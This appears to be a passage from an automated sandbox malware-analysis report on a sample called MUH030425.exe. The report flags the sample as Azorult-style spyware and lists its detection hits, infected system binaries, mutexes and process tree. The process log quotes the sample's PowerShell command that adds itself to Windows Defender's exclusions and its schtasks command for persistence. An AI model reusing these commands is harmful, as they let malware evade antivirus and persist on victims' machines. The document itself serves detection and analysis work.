              Source: MUH030425.exe, 00000000.00000002.1701889184.00000000064DF000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs MUH030425.exe
              Source: MUH030425.exe, 00000000.00000002.1691032810.000000000417E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs MUH030425.exe
              Source: MUH030425.exe, 00000000.00000002.1669836171.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs MUH030425.exe
              Source: MUH030425.exe, 00000000.00000000.1390493328.00000000006A2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamepixuBt.exe: vs MUH030425.exe
              Source: MUH030425.exe, 00000000.00000002.1700321220.00000000050F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameFlatForm.dll2 vs MUH030425.exe
              Source: MUH030425.exe | Binary or memory string: OriginalFilenamepixuBt.exe: vs MUH030425.exe
              Source: unknown | Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
              Source: MUH030425.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 8.2.RegSvcs.exe.4f5999a.6.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_EXEPWSH_DLAgent author = ditekSHen, description = Detects SystemBC
              Source: 8.2.RegSvcs.exe.4eee249.7.raw.unpack, type: UNPACKEDPE | Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
              Source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
              Source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
              Source: AcrobatInfo.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: acrobat_sl.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroBroker.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroCEF.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SingleClientServicesUpdater.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: DiagnosticsHub.StandardCollector.Service.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: FXSSVC.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: elevation_service.exe0.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: maintenanceservice.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msdtc.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: msiexec.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: PerceptionSimulationService.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: perfhost.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Locator.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: MsSense.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SensorDataService.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: snmptrap.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: Spectrum.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: ssh-agent.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: TieringEngineService.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AgentService.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: vds.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: VSSVC.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wbengine.exe.8.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: WmiApSrv.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: wmpnetwk.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SearchIndexer.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcrobatInfo.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: acrobat_sl.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroBroker.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AcroCEF.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: SingleClientServicesUpdater.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: armsvc.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: alg.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              Source: AppVClient.exe.8.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MUH030425.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wBBaygjR.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.spre.phis.troj.spyw.expl.evad.winEXE@38/247@97/21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_00416B94 LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetCurrentProcessId,8_2_00416B94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_0040A4A4 CoCreateInstance,8_2_0040A4A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_02C4CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,8_2_02C4CBD0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\MUH030425.exe | File created: C:\Users\user\AppData\Roaming\wBBaygjR.exe
Source: C:\Users\user\AppData\Roaming\wBBaygjR.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-eab56394c76d7db562e80848-b
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6424:120:WilError_03
Source: C:\Windows\System32\alg.exe | Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-eab56394c76d7db59ea72c54-b
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-eab56394c76d7db5-inf
Source: C:\Users\user\Desktop\MUH030425.exe | Mutant created: \Sessions\1\BaseNamedObjects\mUCKUiGyimzufHA
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-9D9EAFCE-3ADD0605-3F764E8B
Source: C:\Users\user\Desktop\MUH030425.exe | File created: C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp
Source: MUH030425.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: MUH030425.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\MUH030425.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\MUH030425.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SELECT ALL id FROM %s;
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: MUH030425.exe | Virustotal: Detection: 33%
Source: MUH030425.exe | ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\MUH030425.exe | File read: C:\Users\user\Desktop\MUH030425.exe
Source: unknown | Process created: C:\Users\user\Desktop\MUH030425.exe "C:\Users\user\Desktop\MUH030425.exe"
Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\MUH030425.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wBBaygjR.exe"
Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wBBaygjR" /XML "C:\Users\user\AppData\Local\Temp\tmpD1E0.tmp"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: unknown | Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown | Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown | Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Users\user\Desktop\MUH030425.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 1792
Source: unknown | Process created: C:\Users\user\AppData\Roaming\wBBaygjR.exe C:\Users\user\AppData\Roaming\wBBaygjR.exe
Source: unknown | Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown | Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: unknown | Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: unknown | Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: unknown | Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown | Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown | Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
